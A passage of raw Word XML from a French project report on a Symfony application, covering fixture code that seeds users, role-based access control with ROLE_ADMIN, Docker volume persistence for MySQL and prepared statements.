          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B84D7C"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setPassword</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-&gt;hasher-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hashPassword</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'Adpassword123$'</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E817E11" w14:textId="77777777" w:rsidR="00790E86" w:rsidRPr="00CE5980" w:rsidRDefault="00790E86" w:rsidP="00790E86">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CE1AEF"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$manager</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>persist</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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EC049C"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for</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i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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98658"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0</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i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="098658"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>10</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i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A79C0F1"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00FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>new</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User</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEBC973"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setFname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$faker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firstName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9C09D4"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setLname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$faker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lastName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50320E0A"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setEmail</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"user</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$i</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>@gmail.com"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B517192"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setRoles</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"ROLE_USER"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7EC301"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setPassword</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-&gt;hasher-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hashPassword</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'Password123$'</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100BFCD2" w14:textId="77777777" w:rsidR="00790E86" w:rsidRPr="00CE5980" w:rsidRDefault="00790E86" w:rsidP="00790E86">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EEB6B7" w14:textId="77777777" w:rsidR="00790E86" w:rsidRPr="00CE5980" w:rsidRDefault="00790E86" w:rsidP="00790E86">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>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$manager</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>persist</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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE46DAF" w14:textId="77777777" w:rsidR="00790E86" w:rsidRPr="00555B5E" w:rsidRDefault="00790E86" w:rsidP="00790E86">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>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addReference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'user_'</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> . </w:t>
      </w:r>
      <w:r w:rsidRPr="00555B5E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>$i</w:t>
      </w:r>
      <w:r w:rsidRPr="00555B5E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00555B5E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>$user</w:t>
      </w:r>
      <w:r w:rsidRPr="00555B5E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C50BF4C" w14:textId="77777777" w:rsidR="00790E86" w:rsidRPr="00555B5E" w:rsidRDefault="00790E86" w:rsidP="00790E86">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
      </w:pPr>
      <w:r w:rsidRPr="00555B5E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C78FAA" w14:textId="77777777" w:rsidR="00790E86" w:rsidRPr="00555B5E" w:rsidRDefault="00790E86" w:rsidP="00790E86">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
      </w:pPr>
      <w:r w:rsidRPr="00555B5E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00555B5E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>$manager</w:t>
      </w:r>
      <w:r w:rsidRPr="00555B5E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00555B5E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>flush</w:t>
      </w:r>
      <w:r w:rsidRPr="00555B5E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D59511" w14:textId="77777777" w:rsidR="00790E86" w:rsidRPr="00555B5E" w:rsidRDefault="00790E86"/>
    <w:p w14:paraId="60689CA9" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4" w:rsidP="00790E86">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_Toc233817771"/>
      <w:r>
        <w:t>6.1.6 Gestion des utilisateurs et des droits</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
    </w:p>
    <w:p w14:paraId="284EF7E2" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003239D4" w:rsidP="00790E86">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>L'application distingue deux niveaux d'accès gérés par Symfony Security. ROLE_USER est attribué à tout utilisateur inscrit et lui donne accès à son espace personnel (devis, souscriptions, compte). ROLE_ADMIN est réservé à l'administrateur et donne accès à la gestion des souscriptions et à la liste des utilisateurs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78884F92" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003A6B7F" w:rsidP="00790E86">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20619644" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003239D4" w:rsidP="00790E86">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L'accès aux fonctionnalités d'administration est contrôlé par l'attribut PHP </w:t>
      </w:r>
      <w:r w:rsidRPr="00790E86">
        <w:rPr>
          <w:color w:val="117A02" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="00790E86">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="0006208E">
        <w:rPr>
          <w:color w:val="A66500"/>
        </w:rPr>
        <w:t>IsGranted</w:t>
      </w:r>
      <w:r w:rsidRPr="00790E86">
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00790E86">
        <w:rPr>
          <w:color w:val="A33E03" w:themeColor="accent3"/>
        </w:rPr>
        <w:t>'ROLE_ADMIN'</w:t>
      </w:r>
      <w:r w:rsidRPr="00790E86">
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00790E86">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sur chaque contrôleur concerné. Tout utilisateur non authentifié est automatiquement redirigé vers la page de connexion par le pare-feu Symfony configuré dans </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>security.yaml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACE7CDA" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003A6B7F"/>
    <w:p w14:paraId="3E98A258" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4" w:rsidP="00285F95">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="49" w:name="_Toc233817772"/>
      <w:r>
        <w:t>6.1.7 Sauvegarde et restauration</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
    </w:p>
    <w:p w14:paraId="0098DA12" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003239D4" w:rsidP="00285F95">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">En phase de développement, les données de la base MySQL sont persistées automatiquement grâce au volume Docker nommé </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mysql_data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, déclaré dans le fichier docker-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>compose.yml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. Ce volume monte le répertoire /var/lib/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> du conteneur MySQL sur un emplacement géré par Docker sur la machine hôte.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F29EB0" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003A6B7F"/>
    <w:p w14:paraId="5DB339F1" w14:textId="77777777" w:rsidR="00285F95" w:rsidRPr="00285F95" w:rsidRDefault="00285F95" w:rsidP="00285F95">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00285F95">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t># docker-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00285F95">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>compose.yml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3FC2B921" w14:textId="77777777" w:rsidR="00285F95" w:rsidRPr="00285F95" w:rsidRDefault="00285F95" w:rsidP="00285F95">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00285F95">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C44F404"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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00285F95">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00285F95">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C520CCD"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w:t>
      </w:r>
      <w:r w:rsidRPr="00285F95">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>image:</w:t>
      </w:r>
      <w:r w:rsidRPr="00285F95">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00285F95">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>mysql:8.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C1FC07"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w:t>
      </w:r>
      <w:r w:rsidRPr="00285F95">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>volumes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EE4D39"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 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00285F95">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>mysql_data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00285F95">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>:/var/lib/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00285F95">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7F152B6A" w14:textId="77777777" w:rsidR="00285F95" w:rsidRPr="00285F95" w:rsidRDefault="00285F95" w:rsidP="00285F95">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00285F95">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>volumes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2F8C0C"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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00285F95">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00285F95">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>_data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00285F95">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FFB7C9" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003A6B7F"/>
    <w:p w14:paraId="0E3A5AE0" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003239D4" w:rsidP="00285F95">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Grâce à ce volume, les données sont conservées entre les redémarrages du conteneur (docker-compose down puis docker-compose up) sans aucune intervention manuelle. La base n'est réinitialisée que si le développeur exécute explicitement les fixtures ou supprime le volume.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBCEBB9" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003A6B7F" w:rsidP="00285F95">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DABFE13" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4" w:rsidP="00285F95">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="50" w:name="_Toc233817773"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>6.1.8 Sécurité et intégrité des données</w:t>
      </w:r>
      <w:bookmarkEnd w:id="50"/>
    </w:p>
    <w:p w14:paraId="0A3EE351" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003239D4" w:rsidP="00285F95">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Doctrine ORM génère des requêtes préparées (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>prepared</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>statements</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) pour chaque opération en base de données. Les valeurs utilisateur sont transmises via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>setParameter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
